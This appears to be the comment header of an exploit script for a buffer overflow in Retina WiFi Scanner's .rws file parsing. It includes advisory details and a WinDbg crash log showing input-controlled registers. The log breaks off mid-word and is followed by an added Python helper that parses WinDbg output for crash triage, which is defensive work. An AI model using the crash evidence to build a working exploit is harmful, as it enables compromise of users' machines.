#!/usr/bin/python
#
#
# * Title: Retina WiFi Security Scanner 1.0 (.rws parsing) Buffer Overflow Vulnerability
#
#
# * Summary: Retina WiFi Scanner is a tool for detecting IEEE 802.11 (WiFi) based devices.
# * Vendor: eEye Digital Security Inc.
# * Product Web Page: http://www.eeye.com/
# * Current Version: 1.0.8.68
# * Note: The tool is implemented as part of eEye's Retina Network Security Scanner package.
# * Tested On: Microsoft Windows XP Professional SP3 (English)
#
# * Vulnerability Discovered By: Gjoko 'LiquidWorm' Krstic
# * liquidworm gmail com
# * http://www.zeroscience.org
# * 16.05.2009
#
# * Original Advisory: http://www.zeroscience.org/codes/retinawifi_bof.txt
# * eEye Advisory: http://research.eeye.com/html/advisories/published/AD20090710.html
#
#
# * --------------------------------windbg---------------------------------- *
#
# (1268.dd8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=00000003 ecx=000006d8 edx=00000000 esi=0000006c edi=10264da0
# eip=1001dcce esp=0012e72c ebp=0012e754 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
# *** Defaulted to export symbols for [path]\WiFiCore.dll -
# WiFiCore!LibWifi_ReportHTML+0x1b48e:
# 1001dcce f644300401 test byte ptr [eax+esi+4],1 ds:0023:414141b1=??
# 0:000> g
# (1268.dd8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000010 ebx=41414141 ecx=00000000 edx=41414141 esi=00001000 edi=41414150
# eip=7c809eda esp=00121484 ebp=001214b0 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# *** Defaulted to export symbols for [pa
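The WinDbg transcript above is the kind of crash report a fuzzing or incident triage pipeline has to read automatically. The following helper, an added example that is not part of the original advisory or the vendor's tooling, parses such a transcript into one record per access violation and flags registers whose value is the 0x41 fill pattern (or a pointer derived from it), which is how the two faults in this header show that the oversized .rws field reaches a register. The sample text is constructed from the lines quoted above.

```python
import re

# Constructed sample: the two first-chance access violations quoted in the
# advisory header, reduced to the lines the parser needs.
SAMPLE_WINDBG = """\
(1268.dd8): Access violation - code c0000005 (first chance)
eax=41414141 ebx=00000003 ecx=000006d8 edx=00000000 esi=0000006c edi=10264da0
eip=1001dcce esp=0012e72c ebp=0012e754 iopl=0 nv up ei pl nz na pe nc
0:000> g
(1268.dd8): Access violation - code c0000005 (first chance)
eax=00000010 ebx=41414141 ecx=00000000 edx=41414141 esi=00001000 edi=41414150
eip=7c809eda esp=00121484 ebp=001214b0 iopl=0 nv up ei pl zr na pe nc
"""

# 32-bit general-purpose registers as WinDbg prints them (name=8 hex digits).
REG_RE = re.compile(r"\b(e[abcd]x|e[sd]i|e[bsi]p)=([0-9a-fA-F]{8})")
FAULT_RE = re.compile(r"Access violation - code ([0-9a-fA-F]{8})")


def parse_crashes(text):
    """Split a WinDbg transcript into one dict per access violation, each holding
    the exception code and the register snapshot printed after it."""
    crashes = []
    for line in text.splitlines():
        m = FAULT_RE.search(line)
        if m:
            crashes.append({"code": m.group(1), "regs": {}})
            continue
        if crashes:  # register lines belong to the most recent fault
            for reg, val in REG_RE.findall(line):
                crashes[-1]["regs"][reg] = int(val, 16)
    return crashes


def tainted_registers(regs, fill=0x41, window=0x100):
    """Return the registers that hold the fill byte repeated four times, or a value
    within `window` bytes of it (e.g. edi=41414150, a pointer computed from it)."""
    pattern = int.from_bytes(bytes([fill]) * 4, "big")
    return sorted(r for r, v in regs.items() if abs(v - pattern) <= window)


def triage(text):
    """(exception code, tainted registers) for every fault in the transcript."""
    return [(c["code"], tainted_registers(c["regs"])) for c in parse_crashes(text)]


if __name__ == "__main__":
    for code, regs in triage(SAMPLE_WINDBG):
        print("code %s, input-derived registers: %s" % (code, ", ".join(regs) or "none"))
```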